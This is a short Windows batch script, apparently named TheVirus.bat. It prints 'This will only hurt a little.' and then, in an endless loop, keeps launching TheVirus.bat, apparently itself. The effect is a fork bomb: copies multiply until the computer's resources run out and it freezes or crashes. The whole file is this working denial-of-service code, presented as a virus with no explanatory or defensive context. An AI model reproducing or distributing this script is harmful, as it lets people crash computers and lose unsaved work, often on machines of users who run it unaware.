@ECHO OFF

for /l %%x in (,,) do (
	echo "This will only hurt a little."
	start TheVirus.bat
)
